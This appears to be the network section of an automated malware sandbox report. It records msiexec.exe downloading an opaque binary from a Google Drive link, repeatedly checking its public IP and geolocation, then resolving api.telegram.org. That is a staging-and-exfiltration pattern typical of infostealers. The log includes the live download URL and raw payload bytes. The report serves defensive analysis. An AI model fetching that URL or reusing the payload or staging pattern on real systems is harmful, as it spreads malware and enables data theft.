                                                                                                                                                        Dec 19, 2024 08:20:00.627600908 CET53540591.1.1.1192.168.2.4
                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                        Dec 19, 2024 08:19:25.057966948 CET192.168.2.41.1.1.10x2a21Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 19, 2024 08:19:27.850670099 CET192.168.2.41.1.1.10xc252Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 19, 2024 08:19:34.050123930 CET192.168.2.41.1.1.10x43f8Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 19, 2024 08:19:36.054187059 CET192.168.2.41.1.1.10x72d9Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 19, 2024 08:20:00.478123903 CET192.168.2.41.1.1.10x5086Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                        Dec 19, 2024 08:19:25.197334051 CET1.1.1.1192.168.2.40x2a21No error (0)drive.google.com216.58.208.238A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 19, 2024 08:19:27.990449905 CET1.1.1.1192.168.2.40xc252No error (0)drive.usercontent.google.com172.217.17.65A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 19, 2024 08:19:34.189230919 CET1.1.1.1192.168.2.40x43f8No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                        Dec 19, 2024 08:19:34.189230919 CET1.1.1.1192.168.2.40x43f8No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 19, 2024 08:19:34.189230919 CET1.1.1.1192.168.2.40x43f8No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 19, 2024 08:19:34.189230919 CET1.1.1.1192.168.2.40x43f8No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 19, 2024 08:19:34.189230919 CET1.1.1.1192.168.2.40x43f8No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 19, 2024 08:19:34.189230919 CET1.1.1.1192.168.2.40x43f8No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 19, 2024 08:19:36.195871115 CET1.1.1.1192.168.2.40x72d9No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 19, 2024 08:19:36.195871115 CET1.1.1.1192.168.2.40x72d9No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 19, 2024 08:20:00.627600908 CET1.1.1.1192.168.2.40x5086No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                        • drive.google.com
                                                                                                                                                        • drive.usercontent.google.com
                                                                                                                                                        • reallyfreegeoip.org
                                                                                                                                                        • api.telegram.org
                                                                                                                                                        • checkip.dyndns.org
                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.449820193.122.130.0802720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 19, 2024 08:19:34.319214106 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Dec 19, 2024 08:19:35.413820028 CET321INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:35 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: 0771e610c45878a6f7af9dd82fe27180
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                        Dec 19, 2024 08:19:35.417264938 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Dec 19, 2024 08:19:35.736304045 CET321INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:35 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: c7e288ce6aae2f75b07b105c6c299558
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                        Dec 19, 2024 08:19:37.904212952 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Dec 19, 2024 08:19:38.225465059 CET321INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:38 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: 726c66aa9c4e104a1cffa39b0d84d85f
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.2.449837193.122.130.0802720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 19, 2024 08:19:40.259380102 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Dec 19, 2024 08:19:41.356376886 CET321INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:41 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: e6834989b4bc25b58fb3288d40f6dc46
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        2192.168.2.449845193.122.130.0802720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 19, 2024 08:19:43.147336006 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Dec 19, 2024 08:19:44.242521048 CET321INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:44 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: 60fbd330aaf4956525b54067038c4a97
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        3192.168.2.449856193.122.130.0802720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 19, 2024 08:19:46.029876947 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Dec 19, 2024 08:19:47.126243114 CET321INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:46 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: 6d78b49d254407a2dad5861948b22415
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        4192.168.2.449863193.122.130.0802720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 19, 2024 08:19:48.914285898 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Dec 19, 2024 08:19:50.119894981 CET321INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:49 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: e04367701d59a2b2d5db54884d5a6bcf
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        5192.168.2.449871193.122.130.0802720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 19, 2024 08:19:51.907948017 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Dec 19, 2024 08:19:53.010531902 CET321INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:52 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: ece0b22cff4d11cf2db766db6b4f783d
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        6192.168.2.449882193.122.130.0802720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 19, 2024 08:19:54.791032076 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Dec 19, 2024 08:19:55.894915104 CET321INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:55 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: 067a0beb128ee7e4374d6a5dd86b53b3
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        7192.168.2.449889193.122.130.0802720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 19, 2024 08:19:57.684103012 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Dec 19, 2024 08:19:58.781325102 CET321INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:58 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: f25dc38fced7e14abfd5f1e7c15336e7
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.449797216.58.208.2384432720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-19 07:19:26 UTC216OUTGET /uc?export=download&id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                        Host: drive.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-19 07:19:27 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:27 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'nonce-4vpCfDCRJy-Qa7D6TpyU2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.2.449806172.217.17.654432720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-19 07:19:29 UTC258OUTGET /download?id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-12-19 07:19:32 UTC4943INHTTP/1.1 200 OK
                                                                                                                                                        X-GUploader-UploadID: AFiumC57gQNerBz1OtbMJt2hfPFsMNgoUhgzP7BW6E7FbnDUUZ_YUUI_8cE3BS3qbkHWJsc3BGMBEkg
                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Content-Disposition: attachment; filename="UUguINmnKbCga77.bin"
                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Content-Length: 277056
                                                                                                                                                        Last-Modified: Wed, 18 Dec 2024 11:05:08 GMT
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:32 GMT
                                                                                                                                                        Expires: Thu, 19 Dec 2024 07:19:32 GMT
                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                        X-Goog-Hash: crc32c=FnoReQ==
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-19 07:19:32 UTC4943INData Raw: be a1 67 78 ab f1 7c 66 2a 24 09 91 8f f3 88 e4 83 9f 82 ba 60 05 4a 9f 1a 5f 82 2a fc fe df 80 2b c8 df 8b 3c 84 71 5a 72 e1 ee 78 05 5e 55 f8 63 66 0d d7 09 ff b8 2f 53 54 6a 67 92 f5 75 35 47 78 58 4a e2 4f 2c b0 18 89 a5 6c 3c 20 d6 83 44 9b 81 45 33 76 13 26 4e ff 83 d8 08 06 6e 3b 7d 2b a4 a8 29 22 ab 8b 90 2e 9d 11 03 73 5e 68 3a a9 e7 73 1b 6f 94 40 fc 33 d2 25 9f d6 7e 27 91 56 58 7e 7b c3 80 76 3a ae 67 4c 79 6c 01 d3 46 90 25 09 c6 4d ea 32 de 83 37 ab c6 8d 8b 39 cb 0d 90 03 12 5e d6 ec 21 f3 4b 7b 99 1b 87 79 9e 3f 57 7d ef fb 45 f0 e8 02 33 6b 56 15 49 e5 04 ef 68 7e 16 4f 4e c7 d4 08 68 27 ca aa c3 29 f1 4a a2 51 a9 d9 00 f2 5c 4c 9b 9a 8b 08 71 02 88 c8 90 10 f7 0a 30 6e 10 d2 5d d7 2d 38 87 38 e9 b6 4e d9 f9 e0 8d 30 16 7c e4 a1 07 67 62
                                                                                                                                                        Data Ascii: gx|f*$`J_*+<qZrx^Ucf/STjgu5GxXJO,l< DE3v&Nn;}+)".s^h:so@3%~'VX~{v:gLylF%M279^!K{y?W}E3kVIh~ONh')JQ\Lq0n]-88N0|gb
                                                                                                                                                        2024-12-19 07:19:33 UTC4808INData Raw: 26 9b c8 34 2e 26 6a 31 3d aa 6b 83 c8 18 79 2f b3 49 b4 92 b6 e3 84 a1 a5 f1 ef 44 e1 ca e5 32 59 4e fa ee ac a5 56 47 40 ab 0d 7f 0a 2c c8 4a e1 4f 2c b0 1c 89 a5 6c c3 de d6 83 fc 4c 80 45 33 ae 12 26 0e ef 83 d8 08 43 6e 3b 7c 30 94 ab 29 93 ab 8b 90 3d 9d 11 12 73 5e 40 59 a9 e7 79 10 68 bc 1a fc 33 d8 26 70 8a 7e 27 95 26 86 70 7b 7d 89 bc 04 06 eb 5f b4 4d 54 d4 4a e3 05 73 b4 25 8a 2f d9 ee 17 c2 a0 8c 82 56 bf 27 9d 0e 32 2c a9 8e 01 e9 4c 5b dd 5e c7 5d f3 41 37 10 d6 85 22 fa cc 08 20 6e 56 04 4c 96 3f aa 68 74 49 48 5c c1 0f e2 94 41 ca a0 c3 f7 ff 4a b3 57 65 d1 13 f5 38 4c cb 9a 81 2c a9 13 8c b3 fd 10 f7 00 3d b0 20 91 48 d2 01 10 96 3d 86 d7 4a d9 f3 e0 11 ee 18 5c f5 a5 2b 6d 73 31 d4 f3 21 50 68 79 d9 92 94 52 57 0c 38 c3 34 c2 15 d4 70
                                                                                                                                                        Data Ascii: &4.&j1=ky/ID2YNVG@,JO,lLE3&Cn;|0)=s^@Yyh3&p~'&p{}_MTJs%/V'2,L[^]A7" nVL?htIH\AJWe8L,= H=J\+ms1!PhyRW84p
                                                                                                                                                        2024-12-19 07:19:33 UTC1326INData Raw: 55 8c 6d 05 c9 d6 45 81 dc 5f f7 99 83 32 25 cc 6b 55 68 2a 5e 87 16 eb c8 0c 77 69 5e c2 83 8f 0c a3 9f 55 5c 11 98 66 dd 88 55 b9 b6 aa c9 a7 9a 1e 5f 40 17 3f f3 79 16 21 57 9d e3 50 65 7f 95 5f 0c 2e 7b 3b 28 54 27 62 12 1d e4 35 13 ad 18 61 e9 4d aa 6c b2 0b 1a c3 62 a7 9e 6c 7e 7b 12 66 f8 41 88 e5 fe cc 7e 3d 3a da 1b 3f da bf 0e 57 73 2c c9 8c 25 26 5a 50 31 3d f4 18 40 c8 2f 72 40 77 d8 b5 98 b6 fc 8c ce 60 f1 ef 4e 9f f5 e5 32 5d 8c 3d ee ac b4 56 56 48 11 95 6f 0a 52 e0 fe e1 4f 26 c2 b3 99 a5 1c eb 84 d6 83 f6 f4 46 45 33 7c 13 37 06 e2 0e 98 08 06 6f 1e 6b 59 e9 a7 29 52 09 ae 87 06 29 11 03 79 fc 4d 22 db 80 7c 1b 1f 36 65 e5 4d ea 25 1f d2 dc 02 85 3b 69 7f 7b 07 2b 9e 00 68 4c 00 b4 49 f7 9e 33 91 9c 76 b4 52 2f 68 ca ee 17 c2 c8 2b e5 56
